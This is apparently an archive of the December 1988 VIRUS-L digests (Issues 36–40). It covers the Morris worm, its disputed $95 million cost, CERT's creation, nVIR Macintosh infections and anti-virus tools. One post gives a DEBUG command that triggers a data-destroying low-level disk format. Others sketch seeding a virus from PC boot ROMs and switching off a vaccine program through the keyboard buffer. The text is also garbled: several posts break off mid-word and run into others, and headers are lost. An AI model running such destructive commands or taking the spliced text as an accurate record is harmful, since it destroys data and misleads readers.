  1577. From:     Jefferson Ogata (me!) <OGATA@UMDD>
  1578. Subject:  making amends
  1579.  
  1580. Homer's idea of making amends is all very beautiful, but I think it
  1581. really belongs in another universe for two impoange amends-making methods for some
  1582. criminals, while we continue to punish others.  The U.S. legal system
  1583. is not going to change.
  1584.  
  1585. Another problem is that the amends-making arrangement opens up a great
  1586. new realm of crime.  Scenario: a company researcher discovers some-
  1587. thing nifty, but holds off on letting anyone know about it.  He
  1588. promptly goes out and commits some large monetary crime, e.g.
  1589. embezzlement.  If he is caught, he now has the collateral he needs
  1590. to buy back his esteem.  In fact, he may bounce back higher than
  1591. before, and receive useful publicity.
  1592.  
  1593. To restate a point I made a while back: there's no point in us discus-
  1594. sing what SHOULD happen to Morris.  All we can talk about is what will
  1595. happen.  And it doesn't involve making amends.  So forget it.
  1596.  
  1597. - - Jeff Ogata
  1598.  
  1599. ------------------------------
  1600.  
  1601. Date: Tue, 6 Dec 1988 15:53:21 EST
  1602. From: Ken van Wyk <luken@spot.CC.Lehigh.EDU>
  1603. Subject: Internet report (ASCII version) avail. for anon. FTP
  1604.  
  1605. The ASCII .DOC version of Gene Spafford's report on the Internet Worm
  1606. is now available for anonymous FTP from pine.circa.ufl.edu (the same
  1607. place where the PostScript version of the same file is located).
  1608.  
  1609. Enjoy,
  1610.  
  1611. Ken
  1612.  
  1613. ------------------------------
  1614.  
  1615. End of VIRUS-L Digest
  1616. *********************VIRUS-L Digest             Wednesday, 7 Dec 1988        Volume 1 : Issue 36
  1617.                    [A date that will live in infamy...]
  1618.  
  1619. Today's Topics:
  1620. What is a Worm?
  1621. Morris again
  1622. seminar
  1623. Was Morris the author?
  1624. nVIR Strikes Again (Macintosh)
  1625. Virus information files
  1626.  
  1627. ---------------------------------------------------------------------------
  1628.  
  1629. Date:         Tue, 06 Dec 88 20:00:35 EST
  1630. From:         Robert Newberry <RNEWBER@AKRONVM>
  1631. Subject:      What is a Worm?
  1632.  
  1633. Hi All,
  1634.  
  1635. Can someone please give me a good working definition of what a worm is?
  1636.  
  1637.                                                         Rob....
  1638. P.S.  Does anyone know if there is a more up to date version of the
  1639.       the Dirty Dozen list.
  1640.  
  1641. *************************************************************************
  1642. *  Robert Newberry                    * "The Tao gave birth to machine  *
  1643. *  <rnewber@akronvm>                  *  language. Machine language     *
  1644. *  University of Akron,               *  birth to assembler. The        *
  1645. *  Computer Center   Rm. 144d         *  assembler gave birth to the    *
  1646. *  185 Carroll Street                 *  compiler.  etc....."           *
  1647. *  Akron, Ohio  44304   USA           *                                 *
  1648. *************************************************************************
  1649.  
  1650. ------------------------------
  1651.  
  1652. Date: Tue, 6 Dec 88 08:25:00 EST
  1653. From: Rajshree_Bhatt%Wayne-MTS@um.cc.umich.edu
  1654. Subject: Morris again
  1655.  
  1656. I haven't heard anything lately; so what are they going to do with
  1657. poor Morris?  I feel for the poor man, he seems to be a very
  1658. intelligent individual who did not delibrately set out to destroy.
  1659.  
  1660. ------------------------------
  1661.  
  1662. Date: Tue, 6 Dec 88 08:30:10 EST
  1663. From: Rajshree_Bhatt%Wayne-MTS@um.cc.umich.edu
  1664. Subject: seminar
  1665.  
  1666. Is this a one day affair, or does it spread out? What are the topics of
  1667. discussion, if any?
  1668.  
  1669. ------------------------------
  1670.  
  1671. Date: Tue,  6 Dec 88 22:35:25 -0500 (EST)
  1672. From: Michael Francis Polis <mp3o+@andrew.cmu.edu>
  1673. Subject: Was Morris the author?
  1674.  
  1675. >The code
  1676. >appears quite inconsistant, ranging from highly optimized
  1677. >professionally written code (e.g., the crypt function works 9 times
  1678. >faster than the BSD version") to amateurish code with multiple
  1679. >(unused) global variables and subroutines that never get called.
  1680. >Since Morris has not made a public statement acknowledging that he was
  1681. >the (sole) author of the worm, to the best of my knowledge, is it safe
  1682. >to even assume that he did (all) the work?
  1683.  
  1684. Yes, he could have easily done all the work as far as assembling the
  1685. virus is concerned.  At a talk held here on viruses (and worms), it
  1686. was explained that researchers send code (like efficient crypt()
  1687. routines) to each other quite often.  So Morris could have easily
  1688. gotten bits of code from various innocent collegues and patched them
  1689. together.  Also 9 times the speed of a BSD crypt() may not be all that
  1690. fast since BSD crypt() is designed to run slowly to prevent brute
  1691. force password breaking.
  1692.  
  1693. ------------------------------
  1694.  
  1695. Date:  Tue, 6 Dec 88 20:32 MST
  1696. From:  Lypowy@UNCAMULT.BITNET
  1697. Subject:  nVIR Strikes Again (Macintosh)
  1698.  
  1699. I was informed today that one lab at the University of Calgary (a
  1700. Macintosh lab used by Graduate Students, Professors, and
  1701. Undergraduates) has been infected by nVir.  One of the professors
  1702. noticed his applications crashing on a regular basis, did some
  1703. snooping around, and found nVir.  It was apparently given to us from
  1704. some guests that visited the campus after attending a Conference held
  1705. by some members of the U of C faculty.  The infection has not caused
  1706. any loss of data, and has apparently been eradicated through the use
  1707. of some program called NPW Tools or some such (has anyone else heard
  1708. of this program?  If so, please fill me in on it).
  1709.  
  1710. Thought you might like to hear some good news for a change instead of
  1711. another report of infection and loss of data.
  1712.  
  1713.                     Greg Lypowy
  1714.                     Research Assistant
  1715.                     Knowledge Sciences Institute
  1716.                     University of Calgary
  1717.                     Calgary, Alberta
  1718.                     CANADA
  1719.  
  1720. ------------------------------
  1721.  
  1722. Date:     Sat, 3 Dec 88 11:02:16 PST
  1723. From:     Robert Slade <USERCE57@UBCMTSG.BITNET>
  1724. Subject:  Virus information files
  1725.  
  1726. There have been many recent requests for info on viri.  I have
  1727. announced this before, but ... well here goes.
  1728.  
  1729. I have, and am willing to distribute, about 2 meg of info on viri and
  1730. related "security breaking" programs.  Note: info.  I am not willing
  1731. to distribute the viri themselves.
  1732.  
  1733. The bulk of this is messages from RISKS-FORUM, INFO-IBMPC, INFO-MAC,
  1734. VIRUS-L and Computers and Society.  I have recently been editting them
  1735. into separate subject files; FUNCTION, HISTORY, CONTACTS, OPINION,
  1736. RELATED and DEFinition.
  1737.  
  1738. *I WILL NOT MAIL 2 MEG FILES OVER THE NET!* And ubc doesn't support
  1739. FTP.  Send a sufficient number of disks (PC 360K/5 1/4 or 720K/3 1/2)
  1740. with a self addressed *CANADIAN* stamped mailer to:
  1741.  
  1742.  Robert Slade
  1743.  3118 Baird Road
  1744.  North Vancouver, B. C.
  1745.  V7K 2G6
  1746.  
  1747. Amongst the reports: the CHRISTMA EXEC, a report of an Apple DOS 3.3
  1748. virus from 1982, the use of intelligent terminals as "virus" vectors,
  1749. Lehigh, Israeli, and BRAIN MS-DOS viri, nVIR and SCORES mac viri etc.
  1750. etc.
  1751.  
  1752. Next, history, help, etc.?
  1753.  
  1754. ------------------------------
  1755.  
  1756. End of VIRUS-L Digest
  1757. *********************VIRUS-L Digest             Wednesday, 7 Dec 1988        Volume 1 : Issue 37
  1758.  
  1759. Today's Topics:
  1760. Cost of the RTM WORM  and new U.S. legislation
  1761. more conference info
  1762. RE: locking of a PC harddisk
  1763. Low level format (PC)
  1764.  
  1765. ---------------------------------------------------------------------------
  1766.  
  1767. Date:    Wed, 07 Dec 88 08:58 CST
  1768. From:    Ken  De Cruyenaere <KDC@UOFMCC> 204-474-8340
  1769. Subject: Cost of the RTM WORM  and new U.S. legislation
  1770.  
  1771. The Computer Security Institute newsletter (#84) quotes an estimate
  1772. from USA TODAY saying that the cost of the incident exceeds
  1773. $95 million.
  1774.  "This is based on 6200 computer affected, requiring 12 programmers at
  1775.  each site to spend 36 hours each (at $22 per hour) checking out every
  1776.  system that might have been affected, and adding in lost computer
  1777.  time (16 hours per system at $372 per hour).  However, even if this
  1778.  figure substantially overstates the case, there is no doubt that the
  1779.  true costs  were indeed in the millions of dollars."
  1780.  
  1781. The newsletter also provides details of the new virus law (mentioned
  1782. by Don Alvarez in Virus digest #22):
  1783.  "Congressman Wally Herger (R-California) has introduced H.R.5061, the
  1784.   'Computer Virus Eradication Act of 1988'  If passed, this bill would
  1785.   define the introduction or conscious dessemination of (i.e.
  1786.   knowingly passing along to someone else) computer viruses
  1787.   (or other harmful programs) that impact interstate or foreign
  1788.   commerce as a type of 'malicious mischief' prohibited under title
  1789.   18 of the U.S. Code.  Penalties range up to 10 years imprisonment
  1790.   and allow for recovery of damages via civil action.  To obtain a
  1791.   copy of H.R.5061, contact your local Congressional representative."
  1792.  
  1793. ------------------------------
  1794.  
  1795. From: gateh@conncoll.bitnet
  1796. Date: Wed, 7 Dec 88 10:13:48 est
  1797. Subject: more conference info
  1798.  
  1799. It's a two (read one and a half) day seminar, Monday and Tuesday,
  1800. January 30 and 31.
  1801.  
  1802. Preventing and Containing Computer Virus Attacks
  1803.  
  1804. Day 1:
  1805.  
  1806. Introduction:  Overview of the virus phenomenon
  1807.   Thomas Samson, partner, Heidrick & Struggles, Dallas, TX
  1808.  
  1809. Designing Virus-Resistant Systems
  1810.   Patricia Sission, NASA, Greenbelt, MD
  1811.  
  1812. Luncheon Talk:  Legislative update
  1813.   Representative Wally Herger (R-CA)
  1814.  
  1815. Successful security awareness programs
  1816.   Nicholas Elsberg, corp. sec. officer, Aetna Life & Casualty, Hartford, CT
  1817.  
  1818. Conducting a risk assessment
  1819.   Jerrard Gartnet, senior mgr., national auditing services, EDP audit
  1820.         research, Price Waterhouse, Toronto
  1821.  
  1822. Day 2:
  1823.  
  1824. Overview of commercial anti-virus filters and vaccines
  1825.   Robert Jacobsen, IST Inc., New York, NY
  1826.  
  1827. What to do if you have been attacked
  1828.   A special agent with the FBI, Washington, DC
  1829.  
  1830. Liability issues of virus attacks
  1831.   Robert Baker, attorney, Weinberg & Green, Baltimore, MD
  1832.   Marr Haack, dir. of marketing, electronics and information technology,
  1833.         St. Paul Fire & Marine Insurance Co., St. Paul, MN
  1834.   John Landry, chairman, ADAPSO virus committee, executive VP for
  1835.         development, Cullinet Software, Westwood, MA
  1836.  
  1837.  
  1838. Sponsored by nalyzer, IC Strategist, The National Report on
  1839. Computers and Health, Back-Office Bulletin, 411, and Telecommunications Alert
  1840.  
  1841. Hand-typed, so I take full responsibility for typos and erros
  1842.  
  1843. - - Gregg
  1844.  
  1845. _______________________________________________________________________________
  1846. _
  1847. Gregg TeHennepe                        | BITNET:  gateh@conncoll
  1848. Minicomputer Specialist                | Phone:   (203) 447-7681
  1849. Academic Computing and User Services
  1850. Connecticut College
  1851. New London, CT   06320
  1852.  
  1853. ------------------------------
  1854.  
  1855. Date: Wed, 7 Dec 88 08:47 MDT
  1856. From: GORDON_A%CUBLDR@VAXF.COLORADO.EDU
  1857. Subject: RE: locking of a PC harddisk
  1858.  
  1859. To Y. Radai -- regarding locking out a PC harddisk: even though the
  1860. partition table can be altered to fool DOS, a program, such as a
  1861. virus, can initiate a low level format through the disk controller,
  1862. such as implemeted through debug with g=c800:5.
  1863.  
  1864. Allen Gordon
  1865.  
  1866. ------------------------------
  1867.  
  1868. Date:         Wed, 07 Dec 88 11:22:29 EDrd disks while leaving all data
  1869. in place.
  1870.  
  1871. It is put out by Gibson Research Corp (Box 6024, Irvine, CA 92716) and
  1872. I think my copy was about $60.  This is the Gibson that writes a
  1873. column for Inforworld.
  1874.  
  1875. Has anybody used this?  I confess one of the reasons I haven't run is
  1876. that it still seems tricky (although the doco is written so even I can
  1877. understand it) to mess around with low level formatting.  Any comments
  1878. from users would be appreciated.
  1879.  
  1880. Acknowledge-To: <3ZLUFUR@CMUVM>
  1881.  
  1882. ------------------------------
  1883.  
  1884. End of VIRUS-L Digest
  1885. *********************
  1886.  
  1887. VIRUS-L Digest             Thursday, 8 Dec 1988         Volume 1 : Issue 38
  1888.  
  1889. Today's Topics:
  1890. Morris making good
  1891. Pentagon computer 'SWAT team'
  1892.  
  1893. ---------------------------------------------------------------------------
  1894.  
  1895. Date: Wed, 07 Dec 88 18:34:02 CST
  1896. From: GX6692@SIUCVMB.BITNET
  1897. Subject: Morris making good
  1898.  
  1899.    Why not discuss what Morris should have to do to make good his
  1900. 'prank'?  What do you think that th team'
  1901.  
  1902. In today's paper, I noticed that the Pentagon has set up a so called
  1903. 'Swat team' to respond to security threats on their systems.  The
  1904. official name is CERT (Computer Emergency Response Team).  I was
  1905. wondering if such a team could really be that effective??  It seems to
  1906. me that the team would only act after a system had been penetrated and
  1907. some (if any) damage done.  I'm very interested as to whether such a
  1908. setup is really worth the expense.  Any responses would be greatly
  1909. appreciated.
  1910.  
  1911. Greg Galbraith
  1912. <<ST6333@SIUCVMB>>
  1913.  
  1914. [Ed. I can see it now, "This looks like a job for CERTs!"  :-)  Ok, so
  1915. I'm an awful punster...]
  1916.  
  1917. ------------------------------
  1918.  
  1919. End of VIRUS-L Digest
  1920. *********************
  1921.  
  1922. VIRUS-L Digest             Thursday, 8 Dec 1988         Volume 1 : Issue 39
  1923.  
  1924. Today's Topics:
  1925. RE:  CERT organization
  1926. General Macintosh virus query
  1927. re: $95 million cost of Internet Worm
  1928. Spinrite (PC)
  1929. Bursting "HUNT, DOUG" <dhunt@ecf.icst.nbs.gov>
  1930. Subject: RE:  CERT organization
  1931.  
  1932. The CERT organization is not a single "team" of individuals, but
  1933. rather a network of the best and drightest "hackers" or wizards as
  1934. DARPA calls them at the colleges, universities and research
  1935. institutions which compose the ARPANet.  These folks are intended to
  1936. be on call in the case of an emergency and coordinated through various
  1937. local points where communication and processing resources can be amde
  1938. available even if the NET goes down.
  1939.  
  1940. In a sense it is formalizing (but not too much) the actual ad hoc
  1941. activity that occurred around the last event.  It also adds resources
  1942. and what not to support the activity and ensure that there are
  1943. reliable channels of communication and coordination for the ARPAnet
  1944. and Internet users.  IT is focused on the Unix users community and is
  1945. actually coordinated out of SEI.
  1946.  
  1947. It is not truly a DoD activity although it has been organized and
  1948. supported by the DARPA folks.
  1949.  
  1950. ery
  1951.  
  1952. Hello,
  1953.  
  1954. I am an Academic Programmer at the University of Akron, Ohio.  I am
  1955. interested in obtaining more information about viruses and the
  1956. Macintosh.  I know that this is a fairly general request -- but I
  1957. don't have any specific questions.
  1958.  
  1959. We have experienced viruses on the Macintosh, but have not been able
  1960. to detect what they are nor do we have any vaccines for them.  So I
  1961. would like any and all information relating to viruses and vaccines
  1962. that are available.
  1963.  
  1964. I would guess that there are several vaccines available as public
  1965. domain and I would like information about them.  However, I have a
  1966. user who would like to purchase a vaccine (to insure integrity, etc.)
  1967. so if anyone has any information about vaccines available for purchase
  1968. I would like that also.
  1969.  
  1970. I am not on this list so any reponses can be sent to my E-Mail
  1971. address:
  1972.  
  1973. DUBOSE@AKRONVM
  1974.  
  1975. Thank you,
  1976.  
  1977. Kathy DuBose
  1978. The University of Akron
  1979.  
  1980. ------------------------------
  1981.  
  1982. Date: Thu, 8 Dec 88 10:05:84) quotes an estimate
  1983. from USA TODAY saying that the cost of the incident exceeds
  1984. $95 million.
  1985.  "This is based on 6200 computer affected, requiring 12 programmers at
  1986.  each site to spend 36 hours each (at $22 per hour) checking out every
  1987.  system that might have been affected, and adding in lost computer
  1988.  time (16 hours per system at $372 per hour).  However, even if this
  1989.  figure substantially overstates the case, there is no doubt that the
  1990.  true costs  were indeed in the millions of dollars."
  1991. ...End Quote
  1992.  
  1993.      Like many others, when I read this I pulled out my calculator to
  1994.      check how they combined those numbers (ie how many computers are
  1995.      they assuming per "site"?).  Sure enough, $95 million comes from
  1996.      assuming one computer per site.  I think that's nonsense.  I'll
  1997.      bet the average is AT LEAST ten computers per site.  We're pretty
  1998.      small potatoes here and we had something like fourty computers
  1999.      get hit.  That means in order to keep up with the Jones'es, we
  2000.      should have thrown 12x40 = 480 programmers at the problem.  You
  2001.      should not be surprised to say that we managed to handle the
  2002.      incident with less than one dozen programmers total.  Computers
  2003.      and programming does not scale in the normal manner.  Chances
  2004.      are, as the number of computers at a site went up, the number of
  2005.      programmers required per machine went down nearly exponentially
  2006.      (if you only have three machines, you probably have no idea about
  2007.      how they are connected, but if you have 200, you know EXACTLY how
  2008.      every one is connected to every other).
  2009.  
  2010.      If we re-do the NCSC's calculation assuming 10 machines per site
  2011.      and 12 programmers per site, we get a cost of only $40 million.
  2012.      If we then note that the widely quoted 6000 machine number
  2013.      originated in a press conference at MIT where somebody (Jeff
  2014.      Schiller?) made a complete guess, then we have to wonder about
  2015.      the 6200 number (6000 +200 to give it an extra significant
  2016.      digit?).  I've heard much smaller numbers sugested by others
  2017.      (such as three thousand).  That would pull the cost down to more
  2018.      like $20 million.
  2019.  
  2020.      I don't mean to imply that my number is any better than theirs,
  2021.      but if somebody gives you some numbers and then draws a
  2022.      conclusion from them, you have an obligation to see if their
  2023.      conclusion agrees with their numbers, and I think in this case
  2024.      that the answer is that it doesn't.  One computer does not a site
  2025.      make.
  2026.  
  2027.                 Sorry about that... my two sentence flame
  2028.                 seems to have gotten a little out of hand.
  2029.                 thanks for staying with me...
  2030.  
  2031.                         - Don Alvarez
  2032.  
  2033.      + ----------------------------------------------------------- +
  2034.      |   Don Alvarez               MIT Center For Space Research   |
  2035.      |   boomer@SPACE.MIT.EDU      77 Massachusetts Ave   37-618   |
  2036.      |   (617) 253-7457            Cambridge, MA 02139             |
  2037.      + ----------------------------------------------------------- +
  2038.  
  2039. ------------------------------
  2040.  
  2041. Date: Thu, 8 Dec 88 11:00:58 CDT
  2042. From: Len Levine <len@evax.milw.wisc.edu>
  2043. Subject: Spinrite (PC)
  2044.  
  2045. >From:         3ZLUFUR@CMUVM
  2046. >Subject:      Low level format (PC)
  2047. >
  2048. >In v. l:31, H. Smith asks about reformatting hard disks.  I'm not a
  2049. >tekkie, but I assume SpinRite will do the job.  It is advertised
  2050. >mainly as a way to low level format hard disks while leaving all data
  2051. >in place.
  2052. >
  2053. >It is put out by Gibson Research Corp (Box 6024, Irvine, CA 92716) and
  2054. >I think my copy was about $60.  This is the Gibson that writes a
  2055. >column for Inforworld.
  2056.  
  2057. I use it regularly.  Spinrite will NOT clean out viruses that have
  2058. been written to your disk, it will very carefully remove them,
  2059. reformat the disk, and then replace them, just like it does with any
  2060. other code.
  2061.  
  2062. It will, however, "fix" bad blocks that a virus has used to secrete
  2063. stuff, and make them available to the disk again.
  2064.  
  2065. No, if you want to truly clean out any stuff on the disk, a true low
  2066. level reformat with all stuff deleted is the only way.
  2067.  
  2068. As stated earlier in this newsletter, low level formatting is nuclear
  2069. warfare against a virus.
  2070.  
  2071. + - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - +
  2072. | Leonard P. Levine               e-mail len@evax.milw.wisc.edu |
  2073. | Professor, Computer Science             Office (414) 229-5170 |
  2074. | University of Wisconsin-Milwaukee       Home   (414) 962-4719 |
  2075. | Milwaukee, WI 53201 U.S.A.              Modem  (414) 962-6228 |
  2076. + - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - +
  2077.  
  2078. ------------------------------
  2079.  
  2080. Date:     Thu,  8 Dec 88 13:14 EST
  2081. From:     "SysOp: HelpLine BBS (703) 269-4802"
  2082.           <STU_CWHITES@JMUVAX1>
  2083. Subject:  Bursting Digests for VAX/VMS?
  2084.  
  2085.     Although I do like the new digest format, when I want to
  2086. forward one message from a digest to someone I have to
  2087. extract it from mail, and then edit out the particular
  2088. message.  Does anyone know of a way to burst the digest
  2089. into individual messages?  Our system is a VAX.  Thanks!
  2090.  
  2091. Chip Whiteside
  2092. STU_CWHITES@JMUVAX1
  2093.  
  2094. [Ed. GNU EMACS is available for VMS machines (we have it running on
  2095. ours), and it does have an undigestifer.  However, it's undigestifer
  2096. is meant to work with standard Unix RMAIL files, and it may take some
  2097. work to get it to work in VMS.  Anyone out there have any better
  2098. solutions for VMS machines?  How about others, like IBM VM/CMS?]
  2099.  
  2100. ------------------------------
  2101.  
  2102. Date:         Thu, 08 Dec 88 14:33:26 EST
  2103. From:         "Christian J. Haller" <CJH@CORNELLA.ccs.cornell.edu>
  2104. Subject:      Re: Cost of the RTM worm
  2105.  
  2106. >The Computenewsletter (#84) quotes an estimate
  2107. >from USA TODAY saying that the cost of the incident exceeds
  2108. >$95 million.
  2109. > "This is based on 6200 computer affected, requiring 12 programmers at
  2110. > each site to spend 36 hours each (at $22 per hour) checking out every
  2111. > system that might have been affected, and adding in lost computer
  2112. > time (16 hours per system at $372 per hour).  However, even if this
  2113. > figure substantially overstates the case, there is no doubt that the
  2114. > true costs  were indeed in the millions of dollars."
  2115. - ---------------------
  2116. I heard a reporter called somebody at UC Berkeley and asked how many
  2117. computers they had (around 1000) and what percentage were affected
  2118. (around 10%), and then blindly applied this percentage (for a highly
  2119. networked campus) to the number of computers on the Internet.  The
  2120. real percentage is probably much lower.
  2121.  
  2122. Also, what is this about 12 programmers at each site spending 36 hours
  2123. each at $22. per hour?  Most of the computers I know aboey, either.
  2124.  
  2125. These estimates seem like the most hoked-up, self serving bull!**!
  2126. The commercial sources of them should be ashamed.
  2127.  
  2128. - -Chris Haller, Cornell University
  2129.  
  2130. Disclaimer:  My opinions are independent of any official positions of
  2131. my employer.  And I don't know RTM.  And maybe he didn't even do it.
  2132. Acknowledge-To: <CJH@CORNELLA>
  2133.  
  2134. ------------------------------
  2135.  
  2136. Date: Thu, 8 Dec 88 14:55:10 EST
  2137. From: Don Alvarez <boomer@space.mit.edu>
  2138. Subject: re: CERT/SWAT teams
  2139.  
  2140.     Conventional SWAT teams are effective because the law enforcement
  2141.     community has been able to identify a relatively small number
  2142.     of basic scenarios which cover 95% of the crimes they need to
  2143.     respond to.  The SWAT teams are then able to drill the heck out
  2144.     of those scenarios (hostage-taking, bank-robbery, etc.).
  2145.     When they move in, the SWAT team has the advantage of already
  2146.     having been under fire, and of having practiced against exactly
  2147.     the scenario in question.  The cand is not well understood.  People
  2148.     don't understand network vulnerability well enough to develope
  2149.     the same sorts of detailed scenarios that the guns and bombs guys
  2150.     use.  Even worse, the possible responses to computer crime are
  2151.     fairly limited and easy to predict, so in this case the criminal
  2152.     has the advantage of a relatively inexperienced adversary with
  2153.     a limited set of options -- exactly the reverse of the case that
  2154.     the SWAT team relies on.
  2155.  
  2156.     The other advantage that a SWAT team has is detailed knowledge
  2157.     of their comrades strengths and weaknesses.  There does not
  2158.     need to be any discussion as to who will handle a given task:
  2159.     the choice is always obvious in a well prepared team.  This IS
  2160.     something that a CERT-type team could work on.  Another advantage
  2161.     of a SWAT team is that it can mobilize in a hurry and has good
  2162.     communications facilities.  This is another thing which a CERT
  2163.     team could use to its advantage.  One    you were on the same side.  Basically, in my opinion a CERT team
  2164.     would basically be an exercise in group dynamics, collecting and
  2165.     organizing a group of people who through the course of their
  2166.     everyday work have acquired the requisite knowledge to attack the
  2167.     problem.  If done proberly, this could be extremely effective.
  2168.     If done improperly, it could actually reduce your ability to
  2169.     respond because one would place too much trust in the capabilities
  2170.     of the members of the team.
  2171.  
  2172.     It all boils down to who is on the team and how you handle them.
  2173.     Even a single piece of paper with names and phone numbers on it
  2174.     could make an incredible difference.  It would not, however, be
  2175.     a SWAT team.  There are a lot of people in the military who
  2176.     spend their time studying group dynamics.  If you can find someone
  2177.     who understands both group dynamics and computer crime, and bring
  2178.     them into the picture, then you have the possibility of turni- Don Alvarez
  2179.  
  2180.  
  2181.      + ----------------------------------------------------------- +
  2182.      |   Don Alvarez               MIT Center For Space Research   |
  2183.      |   boomer@SPACE.MIT.EDU      77 Massachusetts Ave   37-618   |
  2184.      |   (617) 253-7457            Cambridge, MA 02139             |
  2185.      + ----------------------------------------------------------- +
  2186.  
  2187. ------------------------------
  2188.  
  2189. End of VIRUS-L Digest
  2190. *********************VIRUS-L Digest              Friday, 9 Dec 1988          Volume 1 : Issue 40
  2191.  
  2192. Today's Topics:
  2193. ROM virus distribution (PC & general)
  2194. Two VM/CMS files for LISTSERV
  2195. Mace vaccine (PC)
  2196. Virus talk in NYC
  2197. Info on Mac Viruses
  2198. undigestifying mail in VMS
  2199. the cynics approach to CERTs
  2200. On Morris' "guilt"
  2201. Japanese viruses
  2202. nVir at University of Alaska (Mac)
  2203.  
  2204. ---------------------------------------------------------------------------
  2205.  
  2206. Date: Thu,  8 Dec 88 17:38:43 -0500 (EST)
  2207. From: Michael Francis Polis <mp3o+@andrew.cmu.edu>
  2208. Subject: ROM virus distribution (PC & general)
  2209.  
  2210. Somewhat related to hardware viruses is this idea: Suppose someone who
  2211. repaired IBM PC's and clones wanted to spread a virus.  The bootstrap
  2212. ROMs probably have some extra space at the end of thier memory.  By
  2213. inserting a JSR to this memory into the cold boot interrupt, a short
  2214. program there could be executed during boot-up, but before any
  2215. operating system with file protection could be start.  If the sum of
  2216. the date and the day was say, divisible by 19, then this program would
  2217. copy a small virus also stored in ROM into a program on the boot disk
  2218. (if it was unwisely not write-protected), or the hard disk.  From
  2219. there these viruses would move from disk to disk in a normal manner.
  2220. How many PCs do you think he could get to?  How long do you think it
  2221. would take before someone figured out where the viruses were coming
  2222. from?  Would something similar work with Macs?
  2223.  
  2224. ------------------------------
  2225.  
  2226. Date:         Thu, 08 Dec 88 18:49:49 EDT
  2227. From:         Jean <SSAT@PACEVM>
  2228. Subject:      Two VM/CMS files for LISTSERV
  2229.  
  2230. I just sent two files to luken@lehiibm1. these are bitsend exec and
  2231. bitrcv exec. ifthese could be used on listserv at lehiibm1 it would
  2232. make getting files easier.
  2233.  
  2234. It works on other listserv's so it probably will work there.
  2235.  
  2236. bitsend breaks a file like one of the archives into smaller pieces which
  2237. travel over the network very quickly.
  2238.  
  2239. in case anyone is interested these can be requested from netserv@bitnic
  2240. which is where I got them from.
  2241. Acknowledge-To: <SSAT@PACEVM>
  2242.  
  2243. [Ed. Thanks for the files; I'll look into whether or not they'll be
  2244. useful here.]
  2245.  
  2246. ------------------------------
  2247.  
  2248. Date:         Thu, 08 Dec 88 19:04:53 EDT
  2249. From:         SSAT@PACEVM
  2250. Subject:      Mace vaccine (PC)
  2251.  
  2252. Has anyone had any experiences yet with Mace's vaccine.com ?
  2253.  
  2254. Good or bad, I would like to hear about it. It seems to be a fairly good
  2255. program BUT once loaded it can be shut off, meaning that anyone worth
  2256. his/her salt could stuff the keyboard buffer with VACCINE OFF and a
  2257. carraige return and then tell the system to read the buffer.
  2258. Acknowledge-To: <SSAT@PACEVM>
  2259.  
  2260. ------------------------------
  2261.  
  2262. Date:     Thu,  8 Dec 88 19:16 EST
  2263. From:     Dimitri Vulis <DLV@CUNYVMS1>
  2264. Subject:  Virus talk in NYC
  2265.  
  2266. We got the following in the (snail) mail today:
  2267.  
  2268. The New York Academy of Sciences
  2269. Section of Computer and Information Sciences
  2270.  
  2271. December 13, 1988   Tuesday   8:00 p.m.
  2272.  
  2273. COMPUTER VIRUSES: SEARCHING FOR A CURE
  2274. George Purdy
  2275. Geier Professor of Computer Science
  2276. University if Cincinnati
  2277. Cincinnati, Ohio
  2278.  
  2279.      Computer viruses constitute a clear and present danger not
  2280. only to computers themselves, but also to the complex systems
  2281. used by banks, insurance companies, North American Radar Defense,
  2282. and the New York Stock Exchange. At the moment, all that can be
  2283. done against viruses is ``practice safe computing'' and hope for
  2284. the best.
  2285.  
  2286.      Is there a defense against viruses? We are implementing
  2287. a system of unparelleled security to detect unauthorized changes
  2288. in users' files and software based on a new mathematically secure
  2289. cryptographic function. This approach allows the deterction,
  2290. isolation and excision of infected computer codes.
  2291.  
  2292. (Illistrated with slides)
  2293.  
  2294. Place:
  2295. The New York Academy of Sciences
  2296. 2 ast 63rd Street
  2297. New York, NY 10021
  2298. Telephone (212) 838-0230
  2299. ADMISSION FREE
  2300.  
  2301. (End of flier)
  2302.  
  2303. I have a party planned for Tuesday night, so I can't go and any person
  2304. whom I know who might go there and tell me what this was all about will
  2305. presumably be at the party as well.
  2306.  
  2307. This fellow Purdy does not ask for money upfront and does not quote
  2308. figures like $20M in damages---a good sign.
  2309.  
  2310. ------------------------------
  2311.  
  2312. Date:         Thu, 08 Dec 88 12:36:20 EST
  2313. From:         Joe McMahon <XRJDM@SCFVM>
  2314. Subject:      Info on Mac Viruses
  2315.  
  2316. > I am interested in obtaining more information about viruses and the
  2317. > Macintosh...I would like any and all information relating to viruses
  2318. > and vaccines that are available.
  2319. >
  2320. >...I have a user who would like to purchase a vaccine...
  2321.  
  2322. Ken Van Wyk (the VIRUS-L administrator) forwarded your note to me. We
  2323. have a collection of virus documentation and anti-viral programs here
  2324. on our LISTSERV at SCFVM. TELL LISTSERV AT SCFVM GET VIRUSREM $PACKAGE
  2325. to see what files we have. The individual files can be ordered via
  2326. TELL LISTSERV AT SCFVM GET file name.
  2327.  
  2328. The files are all in BinHex4 format. You'll need to upload them as TEXT
  2329. files to your Mac, and then use either BinHex4, BinHex5, or one of the
  2330. more recent versions of StuffIt to get them into executable format.
  2331. Many of the files are StuffIt archives, so you will probably need
  2332. StuffIt in any case. I would recommend getting StuffIt first (if you
  2333. don't have it), then the virus documentation stack, and then any
  2334. other files which you might need.
  2335.  
  2336. If you don't have a copy of BinHex4, I can send you text files of
  2337. a Microsoft BASIC program and a Turbo Pascal program, each of which
  2338. produces a copy of BinHex4. Also, you can get StuffIt from CompuServe
  2339. or like services. Please drop me a note directly if you need more help.
  2340.  
  2341. As far as purchasing a vaccine, the best ones I know of are free:
  2342.    1) Vaccine from CE Software - guards against all known Mac viruses
  2343.       except the "Dukakis" HyperTalk virus
  2344.    2) Dukakis Vaccine from Ian Summerfeld, Apple UK - guards against
  2345.       the "Dukakis" virus and other HyperTalk viruses.
  2346.  
  2347. Both are available from the SCFVM LISTSERV. Note that neither is a
  2348. guarantee of cleanliness; "safe computing" is the best defense.
  2349.  
  2350. - --- Joe M.
  2351.  
  2352. ------------------------------
  2353.  
  2354. Date:     Fri, 9 Dec 88 02:36:43 EST
  2355. From:     Jefferson Ogata (me!) <OGATA@UMDD>
  2356. Subject:  undigestifying mail in VMS
  2357.  
  2358. I don't have a VMS undigestifyer, but I imagine VMS has a C compiler.
  2359. It's pretty easy to write a C program that will undigestify a
